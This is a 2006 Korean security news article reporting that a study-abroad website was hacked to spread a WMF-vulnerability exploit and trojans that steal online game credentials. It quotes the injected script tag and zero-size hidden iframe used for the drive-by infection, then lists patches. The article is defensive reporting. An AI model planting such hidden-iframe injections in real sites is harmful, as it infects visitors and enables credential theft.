Home > 전체기사

WMF 취약점 이용 새로운 공격 시도 발견

  |  입력 : 2006-01-16 00:00
페이스북 보내기 트위터 보내기 네이버 밴드 보내기 카카오 스토리 보내기

온라인 게임 아이디와 암호 유출 시도 


지오트 바이러스 분석실(GCERT www.geot.com)은 GWHS(Geot Web Hacking Scan)자동화 모니터링 시스템을 통해 15일 오후 7시경 국내 유학관련 사이트에서 korea.wmf 파일을 유포중인 것을 발견했다고 16일 발표했다.


해당 유학관련 사이트에 접속을 하게 되면 인덱스 파일에 포함된 아래의 자바스크립트 코드가 실행된다.

<script type="text/javascript" src="search.js"></script>

search.js 에 의해서 내부에 포함된 아이프레임이 자동으로 실행된다.

<iframe src=img/korea.wmf widht=0 height=0></iframe>

korea.wmf 파일은 보안취약점을 이용해 임시폴더에 korea.exe 를 생성하고 실행한다. korea.exe 는 다시 시스템폴더에 a.exe 를 생성하고, a.exe 는 Explore.exe 와 plugin1.dat 파일을 생성한다.

 


이외에도 지오트는 농산물 관련 한국사이트 1곳, 중국사이트 2곳에서 wmf 취약점을 이용한 트로이목마가 유포중인 것도 GWHS 모니터링 과정에서 발견됐고 지난 주말사이에는 새로운 국산 온라인 게임의 아이디와 암호를 유출시도 하는 새로운 종류의 트로이목마가 유포된 것이 발견됐다고 밝혔다.


그동안 국내 사이트를 해킹해 유포했던 트로이목마는 국산게임의 사용자 정보를 유출시도한적이 있고 14일에는 2곳, 15일에는 3곳의 국내 사이트에서 유포된 Sevad.exe(20,480 바이트)와 noad.dll(25,600 바이트) 파일은 국산 온라인 롤플레잉 게임에서 사용자의 정보를 유출 시도하는 것으로 확인됐다고 밝혔다.


이처럼 국내의 유명 온라인 게임들의 개인정보를 도용할려는 시도가 지속적으로 발견됨에 따라 게임업체와 게임사용자, 인터넷 사용자들의 각별한 주의가 필요하며 인터넷 게임사용자가 아닐지라도 이러한 트로이목마에 감염될 경우 인터넷 속도가 현저히 느려지거나 응용프로그램 오류등의 부작용이 발생할 수 있다고 밝혔다. 


위의 보안취약점을 위해 최신의 백신프로그램과 인터넷 익스플로러를 사용하며, 아래의 보안패치는 반드시 설치해야 한다.

www.microsoft.com/korea/technet/security/bulletin/MS04-013.asp

www.microsoft.com/korea/technet/security/bulletin/MS05-001.msp


지오트 관계자는 “이러한 목적을 가진 행위가 해킹으로 연결되어 국내의 많은 웹사이트가 해킹의 위험에 노출되고 있다”며 “이처럼 많은 사이트들이 웹사이트 변조피해로 인하여, 불특정다수의 사이트 접속자들에게 악의적인 트로이목마 프로그램을 유포하고 있어 각별한 주의가 요망된다”고 당부했다.

[길민권 기자(is21@infothe.com)]


<저작권자: 보안뉴스(www.boannews.com) 무단전재-재배포금지>

  •  
  • 0
  • 페이스북 보내기 트위터 보내기 네이버 밴드 보내기 카카오 스토리 보내기

  •  SNS에서도 보안뉴스를 받아보세요!! 
넷앤드 파워비즈 시작 6월30일~ 시큐아이 에스케어 파워비즈 배너 2022년 3월15일 시작~ 12개월 위즈디엔에스 2018 파워비즈배너 시작 11월6일 20181105-20200131
설문조사
최근 다크웹을 통한 데이터 및 개인정보 유출이 빈번하게 발생하고 있습니다. 다크웹에 대해 아시거나 접속해 보신 적이 있으신가요?
다크웹에 대해 들었지만, 접속해본 적은 없다
1~2번 접속해본 적 있지만, 활용방법은 잘 모른다.
종종 들어가서 업무에 활용하기도 한다.
가끔 전문가를 통해 접속해서 유출 정보를 찾는다.
기타(댓글로)